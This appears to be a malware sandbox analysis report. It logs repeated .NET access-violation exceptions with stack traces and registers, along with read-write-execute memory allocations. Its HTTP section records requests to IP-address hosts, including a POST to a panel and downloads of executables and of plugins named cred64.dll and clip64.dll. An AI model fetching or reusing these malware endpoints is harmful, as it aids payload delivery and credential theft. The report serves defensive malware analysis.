mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7bd4c8 registers.esp: 3598292 registers.edi: 3598344 registers.eax: 0 registers.ebp: 3598356 registers.edx: 4273040 registers.ebx: 3599788 registers.esi: 38470868 registers.ecx: 0	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x469cfa8 0x4698f0c 0x46987a2 0x4698675 0x4696f2b 0x46960c1 0x7bd9ff 0x7b7c1d 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x469cfeb registers.esp: 3596820 registers.edi: 3597164 registers.eax: 0 registers.ebp: 3596828 registers.edx: 0 registers.ebx: 3599788 registers.esi: 39400592 registers.ecx: 40526876	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x469cfa8 0x4698f0c 0x46987a2 0x469868d 0x4696f2b 0x46960c1 0x7bd9ff 0x7b7c1d 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x469cfeb registers.esp: 3596820 registers.edi: 3597164 registers.eax: 0 registers.ebp: 3596828 registers.edx: 0 registers.ebx: 3599788 registers.esi: 39400592 registers.ecx: 38117976	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x469cfa8 0x4698f0c 0x46987a2 0x469868d 0x4696f2b 0x46960c1 0x7bd9ff 0x7b7c1d 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x469cfeb registers.esp: 3596820 registers.edi: 3597164 registers.eax: 0 registers.ebp: 3596828 registers.edx: 0 registers.ebx: 3599788 registers.esi: 38103016 registers.ecx: 39353528	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x469cfa8 0x469dab6 0x469d371 0x4698675 0x4697214 0x46960c1 0x7bd9ff 0x7b7c1d 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x469cfeb registers.esp: 3596796 registers.edi: 3597188 registers.eax: 0 registers.ebp: 3596804 registers.edx: 0 registers.ebx: 3599788 registers.esi: 38103016 registers.ecx: 40662368	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x469cfa8 0x469dab6 0x469d371 0x469868d 0x4697214 0x46960c1 0x7bd9ff 0x7b7c1d 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x469cfeb registers.esp: 3596796 registers.edi: 3597188 registers.eax: 0 registers.ebp: 3596804 registers.edx: 0 registers.ebx: 3599788 registers.esi: 38103016 registers.ecx: 42009120	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x469cfa8 0x469dab6 0x469d371 0x469868d 0x4697214 0x46960c1 0x7bd9ff 0x7b7c1d 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x469cfeb registers.esp: 3596796 registers.edi: 3597188 registers.eax: 0 registers.ebp: 3596804 registers.edx: 0 registers.ebx: 3599788 registers.esi: 38103016 registers.ecx: 43355872	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x469cfa8 0x469e3e2 0x469dd89 0x4698675 0x469732c 0x46960c1 0x7bd9ff 0x7b7c1d 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x469cfeb registers.esp: 3596848 registers.edi: 3597188 registers.eax: 0 registers.ebp: 3596856 registers.edx: 0 registers.ebx: 3599788 registers.esi: 38103016 registers.ecx: 38652092	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x469cfa8 0x469e3e2 0x469dd89 0x469868d 0x469732c 0x46960c1 0x7bd9ff 0x7b7c1d 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x469cfeb registers.esp: 3596848 registers.edi: 3597188 registers.eax: 0 registers.ebp: 3596856 registers.edx: 0 registers.ebx: 3599788 registers.esi: 38102956 registers.ecx: 40046016	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x469cfa8 0x469e3e2 0x469dd89 0x469868d 0x469732c 0x46960c1 0x7bd9ff 0x7b7c1d 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x469cfeb registers.esp: 3596848 registers.edi: 3597188 registers.eax: 0 registers.ebp: 3596856 registers.edx: 0 registers.ebx: 3599788 registers.esi: 38102956 registers.ecx: 41439664	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x469cfa8 0x469eaf4 0x469e551 0x4698675 0x4697432 0x46960c1 0x7bd9ff 0x7b7c1d 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x469cfeb registers.esp: 3596880 registers.edi: 3597188 registers.eax: 0 registers.ebp: 3596888 registers.edx: 0 registers.ebx: 3599788 registers.esi: 38102956 registers.ecx: 42833448	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x469cfa8 0x469eaf4 0x469e551 0x469868d 0x4697432 0x46960c1 0x7bd9ff 0x7b7c1d 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x469cfeb registers.esp: 3596880 registers.edi: 3597188 registers.eax: 0 registers.ebp: 3596888 registers.edx: 0 registers.ebx: 3599788 registers.esi: 38102956 registers.ecx: 39387768	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x469cfa8 0x469eaf4 0x469e551 0x469868d 0x4697432 0x46960c1 0x7bd9ff 0x7b7c1d 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x469cfeb registers.esp: 3596880 registers.edi: 3597188 registers.eax: 0 registers.ebp: 3596888 registers.edx: 0 registers.ebx: 3599788 registers.esi: 38102956 registers.ecx: 40784040	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x469cfa8 0x469fe7b 0x469f426 0x4696119 0x7bd9ff 0x7b7c1d 0x7b72d3 0x7b3c6b 0x7b35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72812652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7282264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72822e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728d74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x728d7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72961dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72961e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72961f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7296416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x469cfeb registers.esp: 3597700 registers.edi: 3597964 registers.eax: 0 registers.ebp: 3597708 registers.edx: 0 registers.ebx: 3599788 registers.esi: 41352948 registers.ecx: 41359924	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (7 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://77.91.68.61/rock/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.47/new/foto5566.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.47/new/fotod250.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.47/anon/an.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.248/fuzz/raman.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.61/rock/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.61/rock/Plugins/clip64.dll

Performs some HTTP requests (7 events)

request	POST http://77.91.68.61/rock/index.php
request	GET http://77.91.124.47/new/foto5566.exe
request	GET http://77.91.124.47/new/fotod250.exe
request	GET http://77.91.124.47/anon/an.exe
request	GET http://77.91.68.248/fuzz/raman.exe
request	GET http://77.91.68.61/rock/Plugins/cred64.dll
request	GET http://77.91.68.61/rock/Plugins/clip64.dll

Sends data using the HTTP POST Method (1 event)

request

POST http://77.91.68.61/rock/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 501 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 1460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 1460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb1000 process_handle: 0xffffffff	1
